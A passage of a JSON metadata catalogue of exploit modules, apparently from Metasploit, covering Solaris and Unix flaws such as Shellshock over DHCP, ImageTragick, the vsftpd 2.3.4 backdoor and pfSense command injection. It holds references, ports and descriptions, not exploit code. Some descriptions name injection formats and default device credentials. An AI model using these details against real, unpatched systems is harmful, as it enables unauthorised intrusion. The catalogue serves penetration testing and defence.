"CVE-2003-0722",
"OSVDB-4585",
"BID-8615"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/sadmind_exec.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/sadmind_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/ypupdated_exec": {
"name": "Solaris ypupdated Command Execution",
"full_name": "exploit/solaris/sunrpc/ypupdated_exec",
"rank": 600,
"disclosure_date": "1994-12-12",
"type": "exploit",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "This exploit targets a weakness in the way the ypupdated RPC\n application uses the command shell when handling a MAP UPDATE\n request. Extra commands may be launched through this command\n shell, which runs as root on the remote host, by passing\n commands in the format '|<command>'.\n\n Vulnerable systems include Solaris 2.7, 8, 9, and 10, when\n ypupdated is started with the '-i' command-line option.",
"references": [
"CVE-1999-0209",
"OSVDB-11517",
"BID-1749"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/ypupdated_exec.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/ypupdated_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/telnet/fuser": {
"name": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability",
"full_name": "exploit/solaris/telnet/fuser",
"rank": 600,
"disclosure_date": "2007-02-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits the argument injection vulnerability\n in the telnet daemon (in.telnetd) of Solaris 10 and 11.",
"references": [
"CVE-2007-0882",
"OSVDB-31881",
"BID-22512"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/solaris/telnet/fuser.rb",
"is_install_path": true,
"ref_name": "solaris/telnet/fuser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_solaris/telnet/ttyprompt": {
"name": "Solaris in.telnetd TTYPROMPT Buffer Overflow",
"full_name": "exploit/solaris/telnet/ttyprompt",
"rank": 600,
"disclosure_date": "2002-01-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module uses a buffer overflow in the Solaris 'login'\n application to bypass authentication in the telnet daemon.",
"references": [
"CVE-2001-0797",
"OSVDB-690",
"BID-5531"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/telnet/ttyprompt.rb",
"is_install_path": true,
"ref_name": "solaris/telnet/ttyprompt",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/dhcp/bash_environment": {
"name": "Dhclient Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/unix/dhcp/bash_environment",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution. Due to length restrictions and the unusual networking scenario at the\n time of exploitation, this module achieves code execution by writing the payload\n into /etc/crontab and then cleaning it up after a session is created.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/exploits/unix/dhcp/bash_environment.rb",
"is_install_path": true,
"ref_name": "unix/dhcp/bash_environment",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_unix/dhcp/rhel_dhcp_client_command_injection": {
"name": "DHCP Client Command Injection (DynoRoot)",
"full_name": "exploit/unix/dhcp/rhel_dhcp_client_command_injection",
"rank": 600,
"disclosure_date": "2018-05-15",
"type": "exploit",
"author": [
"Felix Wilhelm",
"Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>"
],
"description": "This module exploits the DynoRoot vulnerability, a flaw in how the\n NetworkManager integration script included in the DHCP client in\n Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier\n processes DHCP options. A malicious DHCP server, or an attacker on\n the local network able to spoof DHCP responses, could use this flaw\n to execute arbitrary commands with root privileges on systems using\n NetworkManager and configured to obtain network configuration using\n the DHCP protocol.",
"references": [
"CVE-2018-1111",
"URL-https://github.com/kkirsche/CVE-2018-1111",
"URL-https://twitter.com/_fel1x/status/996388421273882626?lang=en",
"URL-https://access.redhat.com/security/vulnerabilities/3442151",
"URL-https://dynoroot.ninja/",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2018-1111",
"URL-https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb",
"is_install_path": true,
"ref_name": "unix/dhcp/rhel_dhcp_client_command_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DynoRoot"
]
}
},
"exploit_unix/fileformat/ghostscript_type_confusion": {
"name": "Ghostscript Type Confusion Arbitrary Command Execution",
"full_name": "exploit/unix/fileformat/ghostscript_type_confusion",
"rank": 600,
"disclosure_date": "2017-04-27",
"type": "exploit",
"author": [
"Atlassian Security Team",
"hdm <x@hdm.io>"
],
"description": "This module exploits a type confusion vulnerability in Ghostscript that can\n be exploited to obtain arbitrary command execution. This vulnerability affects\n Ghostscript versions 9.21 and earlier and can be exploited through libraries\n such as ImageMagick and Pillow.",
"references": [
"CVE-2017-8291",
"URL-https://bugs.ghostscript.com/show_bug.cgi?id=697808",
"URL-https://seclists.org/oss-sec/2017/q2/148",
"URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d",
"URL-https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EPS file"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb",
"is_install_path": true,
"ref_name": "unix/fileformat/ghostscript_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ghostbutt"
],
"RelatedModules": [
"exploit/multi/fileformat/ghostscript_failed_restore",
"exploit/unix/fileformat/imagemagick_delegate"
]
}
},
"exploit_unix/fileformat/imagemagick_delegate": {
"name": "ImageMagick Delegate Arbitrary Command Execution",
"full_name": "exploit/unix/fileformat/imagemagick_delegate",
"rank": 600,
"disclosure_date": "2016-05-03",
"type": "exploit",
"author": [
"stewie",
"Nikolay Ermishkin",
"Tavis Ormandy",
"wvu <wvu@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a shell command injection in the way \"delegates\"\n (commands for converting files) are processed in ImageMagick versions\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n Since ImageMagick uses file magic to detect file format, you can create\n a .png (for example) which is actually a crafted SVG (for example) that\n triggers the command injection.\n\n The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n Ghostscript versions 9.18 and later are affected. This target is\n provided as is and will not be updated to track additional vulns.\n\n If USE_POPEN is set to true, a |-prefixed command will be used for the\n exploit. No delegates are involved in this exploitation.",
"references": [
"CVE-2016-3714",
"CVE-2016-7976",
"URL-https://imagetragick.com/",
"URL-https://seclists.org/oss-sec/2016/q2/205",
"URL-https://seclists.org/oss-sec/2016/q3/682",
"URL-https://github.com/ImageMagick/ImageMagick/commit/06c41ab",
"URL-https://github.com/ImageMagick/ImageMagick/commit/a347456",
"URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SVG file",
"MVG file",
"PS file"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/unix/fileformat/imagemagick_delegate.rb",
"is_install_path": true,
"ref_name": "unix/fileformat/imagemagick_delegate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ImageTragick"
],
"RelatedModules": [
"exploit/unix/fileformat/ghostscript_type_confusion",
"exploit/multi/fileformat/ghostscript_failed_restore"
]
}
},
"exploit_unix/ftp/proftpd_133c_backdoor": {
"name": "ProFTPD-1.3.3c Backdoor Command Execution",
"full_name": "exploit/unix/ftp/proftpd_133c_backdoor",
"rank": 600,
"disclosure_date": "2010-12-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"darkharper2"
],
"description": "This module exploits a malicious backdoor that was added to the\n ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n archive between November 28th 2010 and December 2nd 2010.",
"references": [
"OSVDB-69562",
"BID-45150"
],
"platform": "Unix",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/proftpd_133c_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ftp/proftpd_modcopy_exec": {
"name": "ProFTPD 1.3.5 Mod_Copy Command Execution",
"full_name": "exploit/unix/ftp/proftpd_modcopy_exec",
"rank": 600,
"disclosure_date": "2015-04-22",
"type": "exploit",
"author": [
"Vadim Melihow",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.\n Any unauthenticated client can leverage these commands to copy files from any\n part of the filesystem to a chosen destination. The copy commands are executed with\n the rights of the ProFTPD service, which by default runs under the privileges of the\n 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website\n directory, PHP remote code execution is made possible.",
"references": [
"CVE-2015-3306",
"EDB-36742"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProFTPD 1.3.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb",
"is_install_path": true,
"ref_name": "unix/ftp/proftpd_modcopy_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ftp/vsftpd_234_backdoor": {
"name": "VSFTPD v2.3.4 Backdoor Command Execution",
"full_name": "exploit/unix/ftp/vsftpd_234_backdoor",
"rank": 600,
"disclosure_date": "2011-07-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a malicious backdoor that was added to the VSFTPD download\n archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n June 30th 2011 and July 1st 2011 according to the most recent information\n available. This backdoor was removed on July 3rd 2011.",
"references": [
"OSVDB-73573",
"URL-http://pastebin.com/AetT9sS5",
"URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/vsftpd_234_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/contentkeeperweb_mimencode": {
"name": "ContentKeeper Web Remote Command Execution",
"full_name": "exploit/unix/http/contentkeeperweb_mimencode",
"rank": 600,
"disclosure_date": "2009-02-25",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the ContentKeeper Web Appliance. Versions prior\n to 125.10 are affected. This module exploits a combination of weaknesses\n to enable remote command execution as the Apache user. By setting\n SkipEscalation to false, this module will attempt to setuid the bash shell.",
"references": [
"OSVDB-54551",
"OSVDB-54552",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/http/contentkeeperweb_mimencode.rb",
"is_install_path": true,
"ref_name": "unix/http/contentkeeperweb_mimencode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/ctek_skyrouter": {
"name": "CTEK SkyRouter 4200 and 4300 Command Execution",
"full_name": "exploit/unix/http/ctek_skyrouter",
"rank": 200,
"disclosure_date": "2011-09-08",
"type": "exploit",
"author": [
"savant42"
],
"description": "This module exploits an unauthenticated remote root command execution vulnerability in CTEK SkyRouter 4200 and 4300.",
"references": [
"CVE-2011-5010",
"OSVDB-77497"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/ctek_skyrouter.rb",
"is_install_path": true,
"ref_name": "unix/http/ctek_skyrouter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/dell_kace_k1000_upload": {
"name": "Dell KACE K1000 File Upload",
"full_name": "exploit/unix/http/dell_kace_k1000_upload",
"rank": 600,
"disclosure_date": "2014-03-07",
"type": "exploit",
"author": [
"Bradley Austin (steponequit)",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Kace K1000\n versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547\n which allows unauthenticated users to execute arbitrary commands\n under the context of the 'www' user.\n\n This module also abuses the 'KSudoClient::RunCommandWait' function\n to gain root privileges.\n\n This module has been tested successfully with Dell KACE K1000\n version 5.3.",
"references": [
"URL-http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/http/dell_kace_k1000_upload.rb",
"is_install_path": true,
"ref_name": "unix/http/dell_kace_k1000_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/epmp1000_get_chart_cmd_shell": {
"name": "Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7)",
"full_name": "exploit/unix/http/epmp1000_get_chart_cmd_shell",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP1000 device management portal. It requires any one of the following login\n credentials - admin/admin, installer/installer, home/home - to set up a reverse\n netcat shell. The module has been tested on versions 3.1-3.5-RC7.",
"references": [
"CVE-2017-5255",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD"
],
"mod_time": "2017-12-23 03:04:11 +0000",
"path": "/modules/exploits/unix/http/epmp1000_get_chart_cmd_shell.rb",
"is_install_path": true,
"ref_name": "unix/http/epmp1000_get_chart_cmd_shell",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/epmp1000_ping_cmd_shell": {
"name": "Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5)",
"full_name": "exploit/unix/http/epmp1000_ping_cmd_shell",
"rank": 600,
"disclosure_date": "2015-11-28",
"type": "exploit",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP1000 device management portal. It requires any one of the following login\n credentials - admin/admin, installer/installer, home/home - to set up a reverse\n netcat shell.",
"references": [
"CVE-2017-5255",
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"EPMP"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb",
"is_install_path": true,
"ref_name": "unix/http/epmp1000_ping_cmd_shell",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/freepbx_callmenum": {
"name": "FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",
"full_name": "exploit/unix/http/freepbx_callmenum",
"rank": 0,
"disclosure_date": "2012-03-20",
"type": "exploit",
"author": [
"muts",
"Martin Tschirsich"
],
"description": "This module exploits FreePBX versions 2.10.0, 2.9.0 and possibly older.\n Due to the way callme_page.php handles the 'callmenum' parameter, it\n is possible to inject code into the '$channel' variable in function\n callme_startcall in order to gain remote code execution.\n\n Please note that in order to use this module properly, you must know the\n extension number, which can be enumerated or bruteforced, or you may\n try some of the default extensions such as 0 or 200. Also, the call\n has to be answered (or go to voice).\n\n Tested on both Elastix and FreePBX ISO image installs.",
"references": [
"CVE-2012-4869",
"OSVDB-80544",
"EDB-18649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/freepbx_callmenum.rb",
"is_install_path": true,
"ref_name": "unix/http/freepbx_callmenum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/lifesize_room": {
"name": "LifeSize Room Command Injection",
"full_name": "exploit/unix/http/lifesize_room",
"rank": 600,
"disclosure_date": "2011-07-13",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a vulnerable resource in LifeSize\n Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize\n Room is an appliance and thus the environment is limited\n resulting in a small set of payload options.",
"references": [
"CVE-2011-2763",
"OSVDB-75212"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/unix/http/lifesize_room.rb",
"is_install_path": true,
"ref_name": "unix/http/lifesize_room",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_unix/http/pfsense_clickjacking": {
"name": "Clickjacking Vulnerability In CSRF Error Page pfSense",
"full_name": "exploit/unix/http/pfsense_clickjacking",
"rank": 300,
"disclosure_date": "2017-11-21",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.\n\n pfSense is a free and open source firewall and router. It was found that the\n pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin\n into interacting with a specially crafted webpage it is possible for an attacker\n to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,\n this will result in a full compromise of the pfSense instance.",
"references": [
"CVE-2017-1000479",
"URL-https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html",
"URL-https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes"
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"pfSense <= 2.4.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/pfsense_clickjacking.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_clickjacking",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/pfsense_graph_injection_exec": {
"name": "pfSense authenticated graph status RCE",
"full_name": "exploit/unix/http/pfsense_graph_injection_exec",
"rank": 600,
"disclosure_date": "2016-04-18",
"type": "exploit",
"author": [
"Security-Assessment.com",
"Milton Valencia",
"Jared Stephens"
],
"description": "pfSense, a free BSD based open source firewall distribution,\n version <= 2.2.6 contains a remote command execution\n vulnerability post authentication in the _rrd_graph_img.php page.\n The vulnerability occurs via the graph GET parameter. A non-administrative\n authenticated attacker can inject arbitrary operating system commands\n and execute them as the root user. Verified against 2.2.6, 2.2.5, and 2.1.3.",
"references": [
"CVE-2016-10709",
"EDB-39709",
"URL-http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/http/pfsense_graph_injection_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_graph_injection_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/pfsense_group_member_exec": {
"name": "pfSense authenticated group member RCE",
"full_name": "exploit/unix/http/pfsense_group_member_exec",
"rank": 600,
"disclosure_date": "2017-11-06",
"type": "exploit",
"author": [
"s4squatch",
"h00die"
],
"description": "pfSense, a free BSD based open source firewall distribution,\n version <= 2.3.1_1 contains a remote command execution\n vulnerability post authentication in the system_groupmanager.php page.\n Verified against 2.2.6 and 2.3.",
"references": [
"EDB-43128",
"URL-https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-11-20 20:08:28 +0000",
"path": "/modules/exploits/unix/http/pfsense_group_member_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_group_member_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/http/quest_kace_systems_management_rce": {
"name": "Quest KACE Systems Management Command Injection",
"full_name": "exploit/unix/http/quest_kace_systems_management_rce",
"rank": 600,
"disclosure_date": "2018-05-31",
"type": "exploit",
"author": [
"Leandro Barragan",
"Guido Leo",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in Quest KACE\n Systems Management Appliance version 8.0.318 (and possibly prior).\n\n The `download_agent_installer.php` file allows unauthenticated users\n to execute arbitrary commands as the web server user `www`.\n\n A valid Organization ID is required. The default value is `1`.\n\n A valid Windows agent version number must also be provided. If file\n sharing is enabled, the agent versions are available within the\n `\\kace.local\\client\\agent_provisioning\\windows_platform` Samba share.\n Additionally, various agent versions are listed on the KACE website.\n\n This module has been tested successfully on Quest KACE Systems\n Management Appliance K1000 version 8.0 (Build 8.0.318).",
"references": [
"CVE-2018-11138",
"URL-https://support.quest.com/product-notification/noti-00000134",
"URL-https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/http/quest_kace_systems_management_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/quest_kace_systems_management_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/tnftp_savefile": {
"name": "tnftp \"savefile\" Arbitrary Command Execution",
"full_name": "exploit/unix/http/tnftp_savefile",
"rank": 600,
"disclosure_date": "2014-10-28",
"type": "exploit",
"author": [
"Jared McNeill",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n tnftp's handling of the resolved output filename - called \"savefile\" in\n the source - from a requested resource.\n\n If tnftp is executed without the -o command-line option, it will resolve\n the output filename from the last component of the requested resource.\n\n If the output filename begins with a \"|\" character, tnftp will pass the\n fetched resource's output to the command directly following the \"|\"\n character through the use of the popen() function.",
"references": [
"CVE-2014-8517",
"URL-https://seclists.org/oss-sec/2014/q4/459"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ftp(1)"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/http/tnftp_savefile.rb",
"is_install_path": true,
"ref_name": "unix/http/tnftp_savefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/twiki_debug_plugins": {
"name": "TWiki Debugenableplugins Remote Code Execution",
"full_name": "exploit/unix/http/twiki_debug_plugins",
"rank": 600,
"disclosure_date": "2014-10-09",
"type": "exploit",
"author": [
"Netanel Rubin",
"h0ng10"
],
"description": "TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\n The value of the debugenableplugins parameter is used without proper sanitization\n in a Perl eval statement, which allows remote code execution.",
"references": [
"CVE-2014-7236",
"OSVDB-112977",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/twiki_debug_plugins.rb",
"is_install_path": true,
"ref_name": "unix/http/twiki_debug_plugins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/vmturbo_vmtadmin_exec_noauth": {
"name": "VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution",
"full_name": "exploit/unix/http/vmturbo_vmtadmin_exec_noauth",
"rank": 600,
"disclosure_date": "2014-06-25",
"type": "exploit",
"author": [
"Emilio Pinna <emilio.pinn@gmail.com>"
],
"description": "VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated\n OS Command injection in the web interface. Use reverse payloads for the most\n reliable results. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command when using the cmd generic payload.\n Port binding payloads are disregarded due to the restrictive firewall settings.\n\n This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and\n 4.6.",
"references": [
"CVE-2014-5073",
"OSVDB-109572",
"URL-http://secunia.com/secunia_research/2014-8/"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix CMD",
"VMTurbo Operations Manager"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb",
"is_install_path": true,
"ref_name": "unix/http/vmturbo_vmtadmin_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/http/xdebug_unauth_exec": {
"name": "xdebug Unauthenticated OS Command Execution",
"full_name": "exploit/unix/http/xdebug_unauth_exec",
"rank": 600,
"disclosure_date": "2017-09-17",
"type": "exploit",
"author": [
"Ricter Zheng",
"Shaksham Jaiswal",
"Mumbai"
],
"description": "This module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.\n This allows the attacker to execute arbitrary PHP code in the context of the web user.",
"references": [
"URL-https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/",
"URL-https://paper.seebug.org/397/"
],
"platform": "PHP",
"arch": "php",
